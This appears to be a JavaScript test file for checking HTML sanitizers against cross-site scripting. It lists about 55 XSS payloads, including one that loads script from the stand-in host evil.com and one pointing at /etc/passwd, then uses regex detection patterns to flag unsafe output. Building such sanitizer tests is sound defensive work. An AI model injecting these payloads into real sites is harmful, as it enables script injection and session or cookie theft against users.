const xssTestVectors = [
// Basic Script Injection
`<script>alert('XSS')</script>`,
`<script>alert(String.fromCharCode(88,83,83))</script>`,
`<script>alert(document.cookie)</script>`,
// IMG Tag Attacks
`<img src=x onerror=alert('XSS')>`,
`<img src=x onerror=alert(String.fromCharCode(88,83,83))>`,
`<img src=x onerror=alert(document.cookie)>`,
`<img src="javascript:alert('XSS')">`,
// SVG Attacks
`<svg onload=alert('XSS')>`,
`<svg/onload=alert('XSS')>`,
`<svg><script>alert('XSS')</script></svg>`,
// Event Handler Attacks
`<body onload=alert('XSS')>`,
`<div onclick="alert('XSS')">Click me</div>`,
`<input type="text" onfocus="alert('XSS')" autofocus>`,
`<select onfocus="alert('XSS')" autofocus><option>test</option></select>`,
`<textarea onfocus="alert('XSS')" autofocus>test</textarea>`,
`<button onclick="alert('XSS')">Click</button>`,
// Link/Anchor Attacks
`<a href="javascript:alert('XSS')">Click</a>`,
`<a href="jAvAsCrIpT:alert('XSS')">Click</a>`,
`<a href=" javascript:alert('XSS')">Click</a>`,
`<a href="java\nscript:alert('XSS')">Click</a>`,
// Style Attribute Attacks
`<div style="background-image: url('javascript:alert(1)')">`,
`<div style="expression(alert('XSS'))">`,
`<style>body{background:url("javascript:alert('XSS')")}</style>`,
// Meta Tag Attacks
`<meta http-equiv="refresh" content="0;url=javascript:alert('XSS')">`,
`<meta http-equiv="refresh" content="0;url=data:text/html,<script>alert('XSS')</script>">`,
// Form Attacks
`<form action="javascript:alert('XSS')"><input type="submit"></form>`,
`<form><button formaction="javascript:alert('XSS')">Submit</button></form>`,
// Iframe Attacks
`<iframe src="javascript:alert('XSS')"></iframe>`,
`<iframe src="data:text/html,<script>alert('XSS')</script>"></iframe>`,
// Object/Embed Attacks
`<object data="javascript:alert('XSS')"></object>`,
`<embed src="javascript:alert('XSS')">`,
// Encoded Attacks
`<img src=x onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;">`,
`<img src=x onerror="&#x61;&#x6C;&#x65;&#x72;&#x74;('XSS')">`,
`<a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert('XSS')">Click</a>`,
// Data URI Attacks
`<a href="data:text/html,<script>alert('XSS')</script>">Click</a>`,
`<script src="data:text/javascript,alert('XSS')"></script>`,
// Base64 Encoded
`<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">`,
// Protocol Handlers
`<a href="vbscript:msgbox('XSS')">Click</a>`,
`<a href="file:///etc/passwd">Click</a>`,
// Comments and CDATA
`<!--[if IE]><script>alert('XSS')</script><![endif]-->`,
`<![CDATA[<script>alert('XSS')</script>]]>`,
// Malformed Tags
`<script/src="http://evil.com/xss.js"></script>`,
`<sc<script>ript>alert('XSS')</sc</script>ript>`,
`<<script>alert('XSS');//<</script>`,
// Case Variations
`<ScRiPt>alert('XSS')</ScRiPt>`,
`<IMG SRC=javascript:alert('XSS')>`,
`<iMg SrC=x OnErRoR=alert('XSS')>`,
// Null Bytes and Special Characters
`<script>alert('XSS')</script>`,
`<scr\x00ipt>alert('XSS')</scr\x00ipt>`,
// Multiple Vectors in One
`<div><script>alert('XSS1')</script><img src=x onerror=alert('XSS2')><a href="javascript:alert('XSS3')">Click</a></div>`,
// CSS Expression (IE specific)
`<div style="width: expression(alert('XSS'));">`,
// HTML5 Specific
`<video onerror="alert('XSS')"><source></video>`,
`<audio onerror="alert('XSS')"><source></audio>`,
`<details open ontoggle="alert('XSS')">`,
// Mutation XSS
`<noscript><p title="</noscript><img src=x onerror=alert('XSS')>">`,
// DOM Clobbering
`<form name="getElementById"><img src=x name="ownerDocument" onerror="alert('XSS')"></form>`,
];
// Function to test sanitization
function testSanitization(sanitizeFunction) {
console.log('Testing XSS Prevention...\n');
let passed = 0;
let failed = 0;
xssTestVectors.forEach((vector, index) => {
const sanitized = sanitizeFunction(vector);
// Check if common XSS indicators are present in sanitized output
const hasScript = /<script/i.test(sanitized);
const hasJavascript = /javascript:/i.test(sanitized);
const hasOnEvent = /on\w+\s*=/i.test(sanitized);
const hasVBScript = /vbscript:/i.test(sanitized);
const hasData = /data:text\/html/i.test(sanitized);
const isVulnerable = hasScript || hasJavascript || hasOnEvent || hasVBScript || hasData;
if (isVulnerable) {
console.log(`❌ FAILED Test ${index + 1}: Potential XSS vulnerability detected`);
console.log(` Input: ${vector.substring(0, 50)}...`);
console.log(` Output: ${sanitized.substring(0, 50)}...`);
failed++;
} else {
console.log(`✅ PASSED Test ${index + 1}`);
passed++;
}
});
console.log(`\n========== TEST RESULTS ==========`);
console.log(`Total Tests: ${xssTestVectors.length}`);
console.log(`Passed: ${passed}`);
console.log(`Failed: ${failed}`);
console.log(`Success Rate: ${((passed/xssTestVectors.length) * 100).toFixed(2)}%`);
}
// Export for use
if (typeof module !== 'undefined' && module.exports) {
module.exports = { xssTestVectors, testSanitization };
}
Reference in New Issue View Git Blame Copy Permalink